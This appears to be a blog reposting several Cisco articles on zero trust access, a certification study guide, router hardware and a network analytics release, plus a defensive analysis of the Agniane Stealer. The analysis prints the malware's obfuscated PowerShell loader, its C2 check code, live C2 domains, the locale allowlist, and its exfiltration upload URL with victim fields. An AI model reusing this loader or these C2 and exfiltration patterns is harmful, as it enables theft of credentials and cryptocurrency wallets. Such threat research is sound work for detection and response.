Tuesday, 27 February 2024

The Real Deal About ZTNA and Zero Trust Access

The Real Deal About ZTNA and Zero Trust Access

ZTNA hasn’t delivered on the full promise of zero trust


Zero Trust has been all the rage for several years; it states, “never trust, always verify” and assumes every attempt to access the network or an application could be a threat. For the last several years, zero trust network access (ZTNA) has become the common term to describe this type of approach for securing remote users as they access private applications. While I applaud the progress that has been made, major challenges remain in the way vendors have addressed the problem and organizations have implemented solutions. To start with, the name itself is fundamentally flawed. Zero trust network access is based on the logical security philosophy of least privilege. Thus, the objective is to verify a set of identity, posture, and context related elements and then provide the appropriate access to the specific application or resource required…not network level access.

Most classic ZTNA solutions on the market today can’t gracefully provide this level of granular control across the full spectrum of private applications. As a result, organizations have to maintain multiple remote access solutions and, in most scenarios, they still grant access at a much broader network or network segment level.  I believe it’s time to drop the “network” from ZTNA and focus on the original goal of least-privilege, zero trust access (ZTA).

Classic ZTNA drawbacks


With much in life, things are easier said than done and that concept applies to ZTNA and secure remote access. When I talk to IT executives about their current ZTNA deployments or planned initiatives there are a set of concerns and limitations that come up on a regular basis. As a group, they are looking for a cloud or hybrid solution that provides a better user experience, is easier for the IT team to deploy and maintain, and provides a flexible and granular level of security…but many are falling short.

With that in mind, I pulled together a list of considerations to help people assess where they are and where they want to be in this technology space. If you have deployed some form of ZTNA or are evaluating solutions in this area, ask yourself these questions to see if you can, or will be able to, meet the true promise of a true zero trust remote access environment.

  • Is there a method to keep multiple, individual user to app sessions from piggybacking onto one tunnel and thus increasing the potential of a significant security breach?
  • Does the reverse proxy utilize next-generation protocols with the ability to support per-connection, per-application, and per-device tunnels to ensure no direct resource access?
  • How do you completely obfuscate your internal resources so only those allowed to see them can do so?
  • When do posture and authentication checks take place? Only at initial connection or continuously on a per session basis with credentials specific to a particular user without risk of sharing?
  • Can you obtain awareness into user activity by fully auditing sessions from the user device to the applications without being hindered by proprietary infrastructure methods?
  • If you use Certificate Authorities that issue certs and hardware-bound private keys with multi-year validity, what can be done to shrink this timescale and minimize risk exposure?

While the security and architecture elements mentioned above are important, they don’t represent the complete picture when developing a holistic strategy for remote, private application access. There are many examples of strong security processes that failed because they were too cumbersome for users or a nightmare for the IT team to deploy and maintain. Any viable ZTA solution must streamline the user experience and simplify the configuration and enforcement process for the IT team. Security is ‘Job #1’, but overworked employees with a high volume of complex security tools are more likely to make provisioning and configuration mistakes, get overwhelmed with disconnected alerts, and miss legitimate threats. Remote employees frustrated with slow multi-step access processes will look for short cuts and create additional risk for the organization.

To ensure success, it’s important to assess whether your planned or existing private access process meets the usability, manageability and flexibility requirements listed below.

  • The solution has a unified console enabling configuration, visibility and management from one central dashboard.
  • Remote and hybrid workers can securely access every type of application, regardless of port or protocol, including those that are session-initiated, peer-to-peer or multichannel in design.
  • A single agent enables all private and internet access functions including digital experience monitoring functions.
  • The solution eliminates the need for on-premises VPN infrastructure and management while delivering secure access to all private applications.
  • The login process is user friendly with a frictionless, transparent method across multiple application types.
  • The ability to handle both traditional HTTP2 traffic and newer, faster, and more secure HTTP3 methods with MASQUE and QUIC

Cisco Secure Access: A modern approach to zero trust access


Secure Access is Cisco’s full-function Security Service Edge (SSE) solution and it goes far beyond traditional methods in multiple ways. With respect to resource access, our cloud-delivered platform overcomes the limitations of legacy ZTNA. Secure Access supports every factor listed in the above checklists and much more, to provide a unique level of Zero Trust Access (ZTA). Secure Access makes online activity better for users, easier for IT, and safer for everyone.

The Real Deal About ZTNA and Zero Trust Access

Here are just a few examples:

  • To protect your hybrid workforce, our ZTA architectural design has what we call ‘proxy connections’ that connect one user to one application: no more. If the user has access to several apps as once, each app connection has its own ‘private tunnel’. The result is true network isolation as they are completely independent. This eliminates resource discovery and potential lateral movement by rogue users.
  • We implement per session user ID verification, authentication and rich device compliance posture checks with contextual insights considered.
  • Cisco Secure Access delivers a broad set of converged, cloud-based security services. Unlike alternatives, our approach overcomes IT complexity through a unified console with every function, including ZTA, managed from one interface. A single agent simplifies deployment with reduced device overhead. One policy engine further eases implementation as once a policy is written, it can be efficiently used across all appropriate security modules.
  • Hybrid workers get a frictionless process: once authenticated, they go straight to any desired application-with just one click. This capability will transparently and automatically connect them with least privileged concepts, preconfigured security policies and adaptable enforcement measures that the administrator controls.
  • Connections are quicker and provide high throughput. Highly repetitive authentication steps are significantly reduced.

With this type of comprehensive approach IT and security practitioners can truly modernize their remote access. Security is greatly enhanced, IT operations work is dramatically simplified, and hybrid worker satisfaction and productivity maximized.

Source: cisco.com

Tuesday, 20 February 2024

Agniane Stealer: Information stealer targeting cryptocurrency users

Agniane Stealer: Information stealer targeting cryptocurrency users

The Agniane Stealer is an information-stealing malware mainly targeting the cryptocurrency wallets of its victims. It gained popularity on the internet starting in August 2023. Recently, we have observed a distinct campaign spreading it across our telemetry. Our recent study has led to the successful identification and detailed analysis of a previously unrecognized network URL pattern. Our researchers have recently uncovered more information on the malware’s methods for file collection and the intricacies of its command and control (C2) protocol. We also have new reverse engineering insights into the malware’s architecture and communication.

We believe our work contributes to tactical and operational levels of intelligence regarding Agniane Stealer. It can prove useful from incident response to detector development and would be more suitable for a technical audience.

The Agniane Stealer has already been referenced in several articles. The Agniane stealer malware is being actively marketed and sold through a Telegram channel, accessible at t[.]me/agniane. Potential buyers can make purchases directly via this channel by interacting with a specialized bot, named @agnianebot, which facilitates the transaction process and provides additional information about the malware.” Our technical analysis indicates that it utilizes the ConfuserEx Protector and aims at identical targets. However, it employs a distinct C2 method, based on the sample observed in our telemetry data. Therefore, we have decided to publish a technical analysis of the sample.

Introduction


During our threat-hunting exercises in November 2023, we have noticed a pattern of renamed PowerShell binaries, called passbook.bat.exe. On closer inspection of the host machines, we have identified infections of the newly discovered malware family of Agniane Stealer. Threat research Gameel Ali (@MalGamy12) first disclosed the existence of this malware on their X account. Researchers from the Zscaler ThreatLabz Team and Pulsedive Threat Researchers eventually followed up with blog posts of their own. Our work aims to contribute additional information understanding campaigns involving the use of Agniane Stealer.

Execution Chain


Agniane Stealer: Information stealer targeting cryptocurrency users
Execution chain.

The infections we detected seem to start with the downloading of ZIP files from compromised websites. All the websites from where we have seen the download of this file in our telemetry are normal websites with legitimate content. All download URLs had the below URL pattern:

http[s]://<domain name>\/book_[A-Z0-9]+-\d+\.zip

Once downloaded and extracted, the downloaded ZIP file drops a BAT file (passbook.bat) and additional ZIP file on the file system. The BAT file contains an obfuscated payload and after its execution through cmd.exe, it drops an executable which is renamed version of PowerShell binary (passbook.bat.exe).

This enamed PowerShell was used to execute series of obfuscated commands.

passbook.bat.exe -noprofile -windowstyle hidden -ep bypass -command $_CASH_esCqq = [System.IO.File]::(‘txeTllAdaeR'[-1..-11] -join ”)(‘C:\Users\user\AppData\Local\Temp\15\Rar$DIa63532.21112\passbook.bat’).Split([Environment]::NewLine);foreach ($_CASH_OjmGK in $_CASH_esCqq) { if ($_CASH_OjmGK.StartsWith(‘:: @’)) { $_CASH_ceCmX = $_CASH_OjmGK.Substring(4); break; }; };$_CASH_ceCmX = [System.Text.RegularExpressions.Regex]::Replace($_CASH_ceCmX, ‘_CASH_’, ”);$_CASH_afghH = [System.Convert]::(‘gnirtS46esaBmorF'[-1..-16] -join ”)($_CASH_ceCmX);$_CASH_NtKXr = [System.Convert]::(‘gnirtS46esaBmorF'[-1..-16] -join ”)(‘ws33cUsroVN/EsxO1rOfY1zGajQKWVFEvpkHI/JP6Is=’);for ($i = 0; $i -le $_CASH_afghH.Length – 1; $i++) { $_CASH_afghH[$i] = ($_CASH_afghH[$i] -bxor $_CASH_NtKXr[$i % $_CASH_NtKXr.Length]); };$_CASH_DIacp = New-Object System.IO.MemoryStream(, $_CASH_afghH);$_CASH_yXEfg = New-Object System.IO.MemoryStream;$_CASH_QbnHO = New-Object System.IO.Compression.GZipStream($_CASH_DIacp, [IO.Compression.CompressionMode]::Decompress);$_CASH_QbnHO.CopyTo($_CASH_yXEfg);$_CASH_QbnHO.Dispose();$_CASH_DIacp.Dispose();$_CASH_yXEfg.Dispose();$_CASH_afghH = $_CASH_yXEfg.ToArray();$_CASH_hCnlS = [System.Reflection.Assembly]::(‘daoL'[-1..-4] -join ”)($_CASH_afghH);$_CASH_Xhonj = $_CASH_hCnlS.EntryPoint;$_CASH_Xhonj.Invoke($null, (, [string[]] (”)))

The command line shown above performs the following actions:

  • Reads the content of the previously extracted BAT file (passbook.bat).
  • Through string matches and replacements, builds the payload dynamically and assigns it to a variable.
  • Converted payload and static key from Base64 to a byte array.
  • XOR’d the payload using a static key.
  • Decompressed XOR’d payload using GZIP.
  • Invokes payload after reflectively loading it into memory.

To understand actions taken toward the objective, we reversed the payload.

Binary Analysis


The invoked payload continues with the execution of a C# assembly. We have dumped it into a file, where we get the executable with below hash,

5640c02b6d125d4e14e19709296b29b8ea34fe416e18b3d227bd79310d54b8df.

At time of the analysis, the file was unknown to online sandboxes. We have decided to emulate the activity on the Cisco Secure Malware Analytics sandbox with the generic settings on this file, which is the second stage of the deployment of the stealer. The dynamic analysis could not be completed as we did not execute the first stage of the sample of the malware. Therefore, we decided to analyze the sample manually, where we found later there are anti-sandbox techniques used.

The binary file was highly obfuscated with control flow manipulations, like ConfuserEx.

Agniane Stealer: Information stealer targeting cryptocurrency users
Content of the passbook.bat file. Control flow obfuscation like ConfuserEx.

It is important to note that the sample did not contain a signature for ConfuserEx, yet it had an obfuscation method that resembled it.

After reversing the sample, we realized it contains another binary file in its resources section, which were getting reflectively loaded. The new binary was another C#-based sample, which contained the final payload. It was obfuscated with ConfuserEx with direct signatures.

Agniane Stealer: Information stealer targeting cryptocurrency users
Content of the passbook.bat file. Control flow obfuscation like ConfuserEx.

Agniane Stealer: Information stealer targeting cryptocurrency users
The C# file calling Invoke function for in memory loading and executions, a common approach to reflective loading of resources files.

As you can see from the previous screenshot, it is calling Invoke functions from an entry Point object, which contains a parsed resource.

Agniane Stealer: Information stealer targeting cryptocurrency users
Loading resource data from malicious sample, which is later executed in the memory. The start of the execution is in the image above.

The entire loading process appears as though passbook.bat.exe is executing PowerShell, which is deobfuscating passbook.bat. This, in turn, is running the tmp385C.tmp (tmp385C.tmp is just a header file name) C# applications, which reflectively load the _CASH_78 C# application. The final application in this sequence is the Agniane Stealer:

Agniane Stealer: Information stealer targeting cryptocurrency users
Malware execution chain. _CASH_78 is the final payload. The previous steps were used only for obfuscations. There were multiple stages of sample to finally loading _CASH_78 app. _CASH_78 app is final malware, stages before are used only for delivery, obfuscations or detection evasion.

Command and Control


The Agniane Stealer operates in a straightforward yet efficient manner, stealing credentials and files from the endpoint using a basic C2 protocol. Initially, it verifies the availability of any domain names through a simple C# web request, checking if the return value is “13.” This time request was made to a URL labeled “test,” for instance.

WebClient wc = new WebClient();
urlData = wc.DownloadString(“https://trecube[.]com/test”);

If urlData == “13” {

list_of_active_c2.Add(“trecube[.]com”)

continue;

}

In our sample, we can see the following IOCs (indicators of compromise) presented in resources file:

trecube[.]com

trecube13[.]ru

imitato23[.]store

wood100home[.]ru

For all these domains, the sample is calling for a test URL.

urlList = {“https://trecube.com/“, “https://trecube13.ru/“, “https://imitato23.store/“, “https://wood100home.ru/“}
for domain in domainList:

{

WebClient wc = new WebClient();

urlData = wc.DownloadString(domain + “test”);

If urlData == “13” {

list_of_active_c2.Add(domain)

continue;

}

}

Later, the malware calls C2 to get a list of file extensions to look for. This is located at URL pattern getext?id= followed by an ID – a part of resources of the _CASH_78 file. On this website, the list of extensions is separated by a semicolon, and for example on a website trecube[.]store it looks like:

*.txt; *.doc; *.docx; *.wallet; *seed*
Again, this is handled as previous checking string in the code. It is parsed/split by semicolon and a list of extensions is created in a list of variables in C# code.

Agniane Stealer: Information stealer targeting cryptocurrency users
The Code handling via dynamic analysis, through which we identified the C2 URL as a breakpoint for DownloadString.

Subsequently, the malware requests a remote json file containing the details about errors, VirusTotal hits, etc. Based on this information, the sample either progresses or halts. We chose to focus our investigation on other aspects that are more directly relevant to attribution and detection settings. However, it is important to note that the URL pattern can be utilized for tracking malware through telemetry or online sandbox services for OSINT purposes. The URL looks like:

hxxps://trecube13[.]ru/getjson?id=67
And here what its corresponding output looks like:

{
“debug”: “0”,

“emulate”: “0”,

“virtualbox”: “1”,

“virustotal”: “0”,

“error”: “0”,

“errorname”: “NONE”,

“errortext”: “NONE”

“competitor”: “0”

}

The next stage involves enumeration and collection. It scans the computer to collect all documents with specified extensions instructed by the URL with a “getext” pattern, along with other credentials found in common paths of the operating system, such as Mozilla Firefox storage, Chrome storage and saved Windows credentials. This is a common activity amongst information stealer malware. Additionally, Agniane was checking to see the localization setting of the victim computer. If it contains any of the language packages below, it does not proceed with the infection,

ru-RU
kk-KZ

ro-MD

uz-UZ

be-BY

az-Latn-AZ

hy-AM

ky-KG

tg-Cyrl-TJ

The allowlisting of some regions can also mean the developer does not want to attack specific regions. Based on other observations it is possible to expect the attacker is from a country with a strong diplomatic tie to Russia.

Once all the target files are collected, the malware creates a ZIP archive under the “local application data” folder,

C:\Users\[user]\AppData\Local\[A-Z0-9]{32}

Below is the structure/content of this archive file

Agniane Stealer.txt //added as attachement here
Installe Apps.txt //added as attachement here

PC Information.txt //added as attachement here

Files from Desktop //FOLDER – contains exfiltrated files from Desktop folder

Files from … //FOLDER – contains exfiltrated files from …

… //and other folders, which contain exfiltrated files.

It is later uploaded to

https://trecube[.]com/gate?id=67&build=BAT&passwords=0&cookies=124&username=johnny&country=&ip=&BSSID=633796aa42413148ca7d6ea04c9fc813&wallets=0&token=AGNIANE-67135734941648&ext=0&filters=0&pcname=DESKTOP-9U09UT1&cardsc=0

Below you can find the illustrated version of the Agniane Stealer’s C2 communication,

Agniane Stealer: Information stealer targeting cryptocurrency users
The C2 communication protocol.

Other TTPs


The Agniane Stealer was also seen performing following actions:

  • Enumerating registry key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall for installed applications, it also collects this information.
  • Checking for a public IP on a ip-api.com, i.e, https://ip-api.com/json/?fields=11827
  • Dumping Bitcoin and other cryptocurrency wallets
  • Performing (not well) checks to see if it’s running in a debugged or virtual env. etc.
  • Collecting wallet.dat files.
  • Enumerating Profile and User data.
  • Collecting stored credit cards.
  • Adding other malware like NGenTask.exe.log (the file with the SHA cf342712ac75824579780abdb0e12d7ba9e3de93f311e0f3dd5b35f73a6bbc3).
Source: cisco.com

Monday, 19 February 2024

The Ultimate Study Tips to Prepare For Cisco 300-815 CLACCM Exam

The CCNP Collaboration certification offers a gateway to many opportunities, emphasizing utilizing cutting-edge technologies for remote living and working. Achieving CCNP Collaboration certification demonstrates your proficiency in constructing innovative solutions tailored for the continuously evolving hybrid work landscape. To attain this certification, you must successfully pass two exams. The initial exam is the core exam, designated as 350-801 CLCOR. The subsequent exam is a concentration exam, allowing you to specialize in an area of personal interest. This discussion will concentrate on one of the four concentration exams, specifically the 300-815 CLACCM.

Cisco 300-815 CLACCM Exam Details

Implementing Cisco Advanced Call Control and Mobility Services v1.0 (CLACCM 300-815) is a 90-minute exam with 55-65 questions. The core topics in the exam include:

  • Signaling and Media Protocols (20%)
  • CME/SRST Gateway Technologies (10%)
  • Cisco Unified Border Element (15%)
  • Call Control and Dial Planning (25%)
  • Cisco Unified CM Call Control Features (20%)
  • Mobility (10%)
  • Exam Preparation Tips: Navigating the 300-815 CLACCM Terrain

    Preparing for the 300-815 CLACCM exam requires a strategic approach. Here are invaluable tips to guide you through the preparation process.

    1. Understand the Cisco 300-815 CLACCM Exam Format

    Before diving into your study sessions, take the time to familiarize yourself with the structure and format of the 300-815 CLACCM exam. Understanding the types of questions, exam duration, and scoring criteria will help you tailor your preparation effectively.

    2. Create a Study Schedule

    Efficient time management is vital to exam success. Draft a study schedule that allocates dedicated time slots for each exam topic. Breaking down your learning sessions into manageable chunks will impede overwhelm and assure complete coverage of all exam domains.

    3. Utilize Reliable Resources

    Equip yourself with high-quality study materials and resources tailored specifically for the 300-815 CLACCM exam. From official Cisco guides to reputable online courses and practice tests, leveraging reliable resources will enhance your understanding of exam concepts and boost confidence.

    4. Hands-On Practice

    Theory is essential, but practical application solidifies comprehension. Use lab environments or virtual simulations to reinforce your theoretical knowledge with hands-on practice. Experimenting with real-world scenarios will enhance retention and problem-solving skills.

    5. Stay Updated with Cisco 300-815 CLACCM Exam Topics

    The networking field is constantly evolving, and exam content reflects these changes. Stay abreast of the latest developments, technologies, and industry trends related to the 300-815 CLACCM exam. Subscribe to relevant blogs, forums, and newsletters to remain informed.


    6. Join Study Groups

    Engage with fellow exam candidates by joining study groups or online forums dedicated to the 300-815 CLACCM exam. Collaborating with peers allows for knowledge sharing, peer support, and the opportunity to discuss difficult topics or practice questions.

    7. Practice Time Management

    Simulate exam conditions by taking practice test on nwexam to refine your time management skills. Set timers for practice exams or question sets to ensure you can complete tasks within the assigned timeframe. Practicing under time pressure will help minimize exam-day stress.

    8. Review and Revise Regularly

    Consistent revision is crucial for long-term retention and mastery of exam content. Schedule regular review sessions to boost learning and identify areas that require further attention. Utilize techniques such as flashcards or summarization to aid recall.

    9. Focus on Weak Areas

    Identify your weak areas through practice tests or self-assessment quizzes and prioritize them in your study plan. Allocate additional time and resources to topics where you feel less confident, ensuring a well-rounded understanding of all exam domains.

    10. Maintain a Positive Mindset

    Approach the 300-815 CLACCM exam with a positive mindset and confidence in your abilities. Visualize success, stay motivated, and maintain a healthy balance between study and relaxation. Remember, a positive attitude can significantly impact performance on exam day.

    The CCNP Collaboration Certification: A Gateway to Excellence

    The CCNP Collaboration certification isn't just a badge; it's a testament to your proficiency in deploying, configuring, and troubleshooting Cisco collaboration and unified communication solutions. Let's unravel the benefits that await those pursuing this prestigious certification.

    Elevate Your Expertise in Collaboration Technologies

    Becoming a CCNP Collaboration certified professional signifies a deep understanding of the latest collaboration technologies. This certification ensures you are well-versed in the tools that power modern workplaces, from voice and video communication to conferencing solutions.

    Open Doors to Career Advancement

    In the competitive realm of IT, a CCNP Collaboration certification is a key that unlocks doors to new career opportunities. Employers value the expertise and skills it represents, making you a sought-after professional in the job market.

    Join the Elite League of Networking Professionals

    With the CCNP Collaboration certification, you don't just earn a title; you join an elite league of networking professionals. The industry recognizes the rigor of the certification process, establishing you as a credible authority in collaboration technologies.

    Conclusion: Your CCNP Collaboration Odyssey Begins

    The CCNP Collaboration certification, with its pinnacle represented by the 300-815 CLACCM exam, opens doors to a world of possibilities. Elevate your expertise, advance your career, and join elite networking professionals. As you embark on this odyssey, remember that success is not just a destination; it's a continuous journey of learning, application, and growth. So, gear up, dive into the world of collaboration, and let your CCNP journey unfold!

    Saturday, 17 February 2024

    Award-Winning Centralized Platform Helps Unlock Value Through Simplicity

    From work style to vehicle choice, hybrid has become the new norm. In fact, we are surrounded by use cases that need a hybrid approach to problem solving. And as we all know, networks are evolving. Today, networks need to be ready for new and growing applications such as artificial intelligence (AI), augmented and virtual reality (AR/VR), edge clouds, online gaming, connected cars, and video streaming. As a result, communication service providers (CSPs) are considering more options in redesigning networks.

    For example, network operators need to cater to their customers by delivering services from anywhere between 1G to 100G speeds, while having the ability to aggregate into 400G networks. Operators need a platform that allows them to bridge this gap from 1G to 400G.

    Platform design choices


    Typically, there have been two types of form factors for routing platforms: fixed and distributed systems.

    Fixed systems can contain a single forwarding chip and single route processor (RP) with fixed interfaces (see Figure 1). Fixed systems typically come in a “pizza box” form factor that is often used in network architectures that are more predictable and simpler, where using a system with fixed interfaces is suitable for anticipated network traffic patterns.

    Award-Winning Centralized Platform Helps Unlock Value Through Simplicity
    Figure 1. Fixed system

    Distributed systems use a different architecture (see Figure 2), where the packet-forwarding decisions and actions take place on the network processor units (NPUs)/forwarding engines located on the individual line cards. Each card maintains a copy of the forwarding information base (FIB) that is distributed by the RP in the control plane. Large distributed systems have traditionally been designed to provide higher total system bandwidth and port densities, field-replaceable line cards, interface diversity, and redundancy.

    These requirements have far exceeded what could be accomplished with a single NPU on a fixed system, which is why every line card has multiple NPUs participating in the forwarding decisions. This architecture helps deliver favorable customer outcomes with increased reliability and flexibility.

    Award-Winning Centralized Platform Helps Unlock Value Through Simplicity
    Figure 2. Distributed system

    New hybrid choice with centralized architecture


    With the evolution of the network and emergence of more localized and metro-driven traffic patterns, there is a need for network operators to deploy a solution that meets the needs of both fixed and distributed systems. Cisco 8000 Series Routers address this customer problem and market need by delivering a platform that is uniquely positioned to support the reliability and flexibility offered by distributed solutions, while also delivering value with the customer investments.

    Instead of having to choose between a fixed or distributed system, customers can now also consider the new centralized system with Cisco 8600 Series Routers (see Figure 3), which blend the resource efficiency of fixed systems with the interface flexibility, upgradeability, and redundancy of distributed systems.

    Award-Winning Centralized Platform Helps Unlock Value Through Simplicity
    Figure 3. Centralized system

    Similar to distributed systems, centralized systems have in-service, replaceable, redundant RPs with CPU and redundant switch cards (SCs) with NPUs to support both data plane and control plane redundancy. Cisco 8600 Series Routers have modular port adapters (MPAs) that can be replaced while in service and enable interface flexibility. Like fixed systems, the forwarding decisions on centralized platforms are handled centrally on the RP/SC instead of the line card.

    With the unique centralized design of Cisco 8600 Series Routers, the life of a data packet is carefully managed such that when traffic ingresses on one of the MPA interfaces, the physical layer (PHY) on the ingress MPA sends the traffic to both SCs. The Silicon One ASIC on both SCs processes the packets, so in the event of a failure with the active SC, the other standby SC always has all the packets to support data plane redundancy. At a point in time, only the packets processed by the active SC are forwarded to the network, and packets processed by the standby SC are dropped.

    Use cases


    With currently over five billion global internet users, it is becoming increasingly impractical for capabilities such as peering to happen at only traditional, centralized internet exchanges. Distributed peering points are emerging across the network to help avoid unnecessarily backhauling traffic to centralized locations. However, metro locations such as colocation sites, data centers, and central offices can be space-constrained, and every additional rack unit (RU) of space is extremely costly.

    Deploying right-sized platforms like Cisco 8600 Series Routers can address some of the operator resource challenges while achieving lower upfront costs, data plane and control plane redundancy, port diversity, and architectural simplicity using single-chip forwarding with less components to help lower TCO.

    Additional use cases for the Cisco 8608 router include as a core label switch router (LSR), routed data center top-of-rack (ToR)/leaf, and aggregation for cloud and CSP networks. Cisco 8600 Series Routers are also part of the Cisco routed optical networking solution, with support for 400G DCO optics to improve network operational efficiency and simplicity.

    Cisco innovations


    Cisco Silicon One offers unmatched flexibility with a common silicon architecture, including software development kit (SDK) and P4 programmable forwarding code across multiple network roles (see Figure 4), while supporting fixed, distributed, and centralized systems (see Figure 5). With Cisco Silicon One used in Cisco 8600 Series Routers, we maintain the architectural simplicity and uniformity across the three architecture types. Having a unified architecture helps network operators simplify operations through consistency with upgrades, feature parity, training, testing/qualification, deployment, and troubleshooting.

    Award-Winning Centralized Platform Helps Unlock Value Through Simplicity
    Figure 4. Cisco Silicon One portfolio and network roles

    Award-Winning Centralized Platform Helps Unlock Value Through Simplicity
    Figure 5. Form factor types using Cisco Silicon One

    Silicon One architecture achieves high performance and full routing capabilities without external memories. The clean-sheet internal architecture includes on-chip high-bandwidth memory (HBM) and supports multiple modes of operation by enabling a router to operate with a single forwarding chip, a line card network processor, and a switch fabric element. This flexibility enables consistent software experience in multiple roles and rapid silicon evolution.

    Benefits of simplicity and uniformity across the three architecture types for network operators include:

    • Consistent software experience across multiple network nodes.
    • Simplified network operations through consistency with upgrades, qualification, deployment, and troubleshooting.
    • Unified security and trust across the network.
    • Programmable interfaces via consistent APIs.

    In addition to the capabilities of the Silicon One chipset, Cisco 8600 Series Routers include significant innovations, such as the Cisco IOS XR network operating system (NOS) and the chassis design itself. For example, Cisco 8600 Series Routers enable all major components to be in-service field-replaceable, which helps reduce operational costs.

    The single-forwarding chip design on Cisco 8600 Series Routers is well suited for smaller locations by offering simplicity through more bandwidth with fewer components, which helps streamline costs, power, and space (including with chassis depth of less than 600 mm) while also reducing latency.

    The first platform in the Cisco 8600 Series Routers product line is the Cisco 8608 router, which includes these components:

    • Chassis: The router has an eight-slot 7RU chassis at 580 mm depth, which hosts fans, power supplies, RPs, SCs, and MPAs.
    • Route processor: The RP hosts the CPU complex and the I/O ports. RPs fit vertically in the chassis from the front panel. Up to two RPs are supported in the system and the RPs operate in active-standby mode for a redundant system.
    • Switch card: SCs sit orthogonally in the back of the MPAs with connections to all MPAs. SCs directly host the NPUs, with up to two SCs in the system that work in active-standby mode to deliver data plane redundancy.
    • Power supplies: The router has four power supplies that can provide redundant power to the system. The power options include pluggable 3.2 KW AC and pluggable 3.2 KW DC.
    • Fans: There are eight fans in the system, with each fan individually removable or replaceable to provide N+1 fan redundancy to the system.
    • Modular port adapters: With a high degree of flexibility, the Cisco 8608 router supports a diverse range of interfaces, including 4×400 GbE, 24×10/25/50 GbE, and a combination of 16×100 GbE or 12×100 GbE+1×400 GbE or 8×100 GbE+2×400 GbE.
    • Network operating system: Cisco IOS XR is the common NOS across access, aggregation, edge, and core platforms, including Cisco 8600 Series Routers. IOS XR provides network intelligence, programmability, and trustworthy solutions to help deliver operational efficiency.
    • Manageability: Cisco Crosswork Network Automation is a comprehensive software platform that helps plan, provision, manage, optimize, and assure multi-vendor/multi-domain networks, including Cisco 8600 Series Routers, to help reduce operational costs.

    Customer benefits


    The centralized architecture of Cisco 8600 Series Routers enables customers to take advantage of three main benefits (see Figure 6), including:

    • Reliability: The unique hardware architecture provides industry-leading reliability with both control plane and data plane redundancy without loss of any front face plate.
    • Flexibility: In-service upgradability and mix-and-match port support from 1G to 400G to help to efficiently meet both user and network traffic demands.
    • Value: Customers can experience greater value with:
      • Investment protection
        • MPA backward compatibility
        • Next-generation SC compatibility
      • Optimized CapEx spending with right-sized platform to meet specific scale, space, power, and redundancy requirements
      • Optimized OpEx spending with field-upgradeable and reusable components (similar to distributed systems) combined with using automated operations
      • Sustainability that can help customers toward meeting their sustainability goals using a simplified centralized architecture.

    Award-Winning Centralized Platform Helps Unlock Value Through Simplicity
    Figure 6. Enabling customer outcomes

    Meet evolving network priorities


    Cisco is empowering customers with a hybrid architecture to meet their ever-changing network demands. Cisco 8600 Series Routers are a culmination of innovations in silicon, software, and hardware—all coming together to deliver a new breed of simple, reliable, flexible routers that give customers more choices and help maximize value.

    Source: cisco.com

    Thursday, 15 February 2024

    Secure Network Analytics 7.5.0 Launch

    Secure Network Analytics 7.5.0 Launch

    Secure Network Analytics (SNA) Release 7.5.0 is generally available as of January 22, 2024. All current customers are eligible to upgrade and should look at the release notes to better understand the upgrade process and any additional considerations.

    SNA is Cisco’s Network Detection and Response solution.  SNA provides enterprise-wide network visibility to detect and respond to threats in real- time. The solution continuously analyzes network activities to create a baseline of normal network behavior. It then uses this baseline, along with non–signature-based advanced analytics that include behavioral modeling and machine learning algorithms, as well as global threat intelligence to identify anomalies and detect and respond to threats in real- time. Secure Network Analytics can quickly and with high confidence detect threats such as Command-and-Control (C&C) attacks, ransomware, Distributed-Denial-of-Service (DDoS) attacks, illicit cryptomining, unknown malware, and insider threats. With an agentless solution, you get comprehensive threat monitoring across the entire network traffic, even if it’s encrypted.


    This release delivers the innovation and usability that customers expect from the platform. By directly integrating firewall logs, improving response management, and updating the platform to meet the latest certification mandates, release 7.5.0 combines essential platform development with new features and enhancements.

    Firewall Logs Generate Events in Secure Network Analytics


    Given their location at the edge of the network, firewalls see a vast amount of traffic and behaviors that may be indicative of an attack. In this release, Secure Network Analytics can take logs directly from Cisco Firewall Management Center (FMC), Firewall Threat Defense (FTD) and ASA. These logs are converted into a format that looks like NetFlow but does not count against your flows per second (FPS) license. Enabling this configuration gives further insight into your traffic patterns, risks, and the scope of an attack.

    New Response Management Actions


    Automated responses improve the workflow for Security Operations Center (SOC) analysts and are a core component of our Network Detection and Response solution. By providing flexibility for multiple response actions, SOC analysts can ensure proper action is taken based on a specific alert type. This release adds Central Analytics detections to Response Management workflows, including the ability to deliver email, syslog, threat response, or webhook.

    Secure Network Analytics 7.5.0 Launch

    Data Enrichment from Secure Network Analytics to Cisco XDR


    With the 7.5.0 release, security events contribute directly into XDR investigations. Also, XDR response actions can now be applied to alerts.

    Other Enhancements


    Additionally, this release provides improvements to the overall security and usability of the platform. Secure Network Analytics can achieve the certifications required by customers, including DODIN-APL, FIPS 140-3, Level 1, Common Criteria, USGv6, and IPv6 ready Logo. Some of these enhancements include:

    • TLS 1.3: TLS 1.3 is now supported, and TLS 1.2 is still supported. These protocols should be used for inter-appliance and external TLS connections, and can be configured in SystemConfig to be TLS 1.3 only or both TLS 1.2 and 1.3
    • Root access restriction: Root access has been removed. TAC will have access for troubleshooting purposes using the Cisco Consent Token mechanism via SystemConfig.
    • New SystemConfig workflows: New workflows added that non root user sysadmin can action, including Diag Packs, License Reservation, Data Store operations, and more.
    • MongoDB upgrade: Moved to a version that uses an already available package rather than a custom-built version.

    In addition to these enhancements –we have improved certificate rotation and management, IPv6 support, and support for M4, M5, and M6 appliances.

    By simplifying workflows, increasing compliance, and expanding detections, Secure Network Analytics Release 7.5.0 continues to prove its value as a central component of your SOC. We encourage you to review the release notes and speak with your local Cisco provider to begin planning your upgrade.

    Source: cisco.com

    Tuesday, 13 February 2024

    How GLP-1 Drug Success Transforms Healthcare Revenue – Is your Organization Ready?

    How GLP-1 Drug Success Transforms Healthcare Revenue – Is your Organization Ready?

    The huge revenue opportunity stemming from recent success of GLP-1 drugs is not just for the pharmaceutical companies. Is your healthcare organization poised to capture the patient care opportunity emerging from GLP-1 pharmaceutical innovation?

    Revolutionizing Healthcare with Breakthroughs in Diabetes and Obesity Treatment


